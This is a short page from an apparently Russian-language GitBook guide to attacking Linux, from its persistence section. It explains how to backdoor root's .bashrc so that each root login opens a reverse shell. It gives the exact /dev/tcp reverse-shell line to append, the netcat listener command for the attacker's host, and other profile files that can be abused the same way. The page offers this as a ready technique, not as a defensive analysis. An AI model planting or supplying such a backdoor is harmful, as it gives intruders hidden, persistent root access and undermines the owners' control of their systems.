🍻
Linux under attack
  • ΠŸΡ€Π΅Π΄ΠΈΡΠ»ΠΎΠ²ΠΈΠ΅
  • ОглавлСниС
  • ΠžΠΊΡ€ΡƒΠΆΠ½ΠΈΠ΅
  • Recon
    • 00 - Info
    • 01 - ΠžΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ источники
  • SCAN
    • 00 - Info
    • 01 - Π‘ΠΊΠ°Π½ nmap
    • 02 - Π‘ΠΊΠ°Π½ срСдствами OC
    • 03 - ΠžΠ±Ρ„ΡƒΡΠΊΠ°Ρ†ΠΈΡ IP
    • 04 - Π‘ΠΊΠ°Π½ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΉ сайта
    • 05 - CΠΊΠ°Π½ ΠΏΠΎΠ΄Π΄ΠΎΠΌΠ΅Π½ΠΎΠ²
    • 06 - Π‘ΠΊΠ°Π½ WordPress
  • Vulnerability Analysis
    • 00 - Анализ
  • Exploitation
    • 00 - Info
    • 01 - BruteForce
    • 02 - Local Enumeration
  • Privilege Escalation
    • 00 -Info
    • 01 - Π›ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹Π΅ Π°ΠΊΠΊΠ°ΡƒΠ½Ρ‚Ρ‹
    • 02 - Crack hash
    • 03 - Misconfig
    • 04 - Kernel exploits
  • PERSISTENCE
    • 00 - info
    • 01 - SSH Keys
    • 02 - ПсСвдоROOT Π°ΠΊΠΊΠ°ΡƒΠ½Ρ‚
    • 03 - bashrc
    • 04 - Cron Jobs
    • 05 - Systemd
    • 06 - Systemd Timers
    • 07 - rc.local
    • 08 - MOTD
    • 09 - APT
    • 10 - Git hook
    • 11 - Git config
    • 12 - PAM backdoor
  • Π—Π°ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅
Powered by GitBook
On this page
  1. PERSISTENCE

03 - bashrc

Previous02 - ПсСвдоROOT Π°ΠΊΠΊΠ°ΡƒΠ½Ρ‚Next04 - Cron Jobs

Last updated 1 year ago

ΠœΡ‹ ΠΌΠΎΠ΄ΠΈΡ„ΠΈΡ†ΠΈΡ€ΡƒΠ΅ΠΌ Ρ€ΡƒΡ‚ΠΎΠ²Ρ‹ΠΉ bashrc Ρ‚Π°ΠΊ, Ρ‡Ρ‚ΠΎ ΠΊΠ°ΠΆΠ΄Ρ‹ΠΉ Ρ€Π°Π· ΠΊΠΎΠ³Π΄Π° Π»Π΅Π³ΠΈΡ‚ΠΈΠΌΠ½Ρ‹ΠΉ root Π±ΡƒΠ΄Π΅Ρ‚ Π»ΠΎΠ³ΠΈΠ½ΠΈΡ‚ΡŒΡΡ, ΠΌΡ‹ Π±ΡƒΠ΄Π΅ΠΌ ΠΏΠΎΠ»ΡƒΡ‡Π°Ρ‚ΡŒ reverse shell. Π’ΠΎ ΠΆΠ΅ самоС ΠΌΠΎΠΆΠ½ΠΎ ΠΏΡ€ΠΎΠ΄Π΅Π»Ρ‹Π²Π°Ρ‚ΡŒ с: ~/.bash_profile ~/.bash_login ~/.profile /etc/profile /etc/profile.d /etc/bash.bashrc Π’ΡƒΡ‚ ΠΎΡ‚Π»ΠΈΡ‡Π½Ρ‹ΠΉ ΠΎΠ½Π»Π°ΠΉΠ½ 

// Π½Π° Π°Ρ‚Π°ΠΊΡƒΠ΅ΠΌΠΎΠΌ хостС добавляСм строку Π² /root/.bashrc
/bin/bash -i >& /dev/tcp/192.168.140.128/9010 0>&1

// На хостС Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰Π΅Π³ΠΎ запускам netcat 
nc -lvp 9010

Π’Π΅ΠΏΠ΅Ρ€ΡŒ ΠΊΠ°ΠΊ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ ΠΊΡ‚ΠΎ Ρ‚ΠΎ Π·Π°Π»ΠΎΠ³ΠΈΠ½ΠΈΡ‚ΡŒΡΡ ΠΏΠΎΠ΄ ΡƒΡ‡Π΅Ρ‚ΠΊΠΎΠΉ root, ΠΌΡ‹ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΠΌ шСлл

Reverse Shell Generator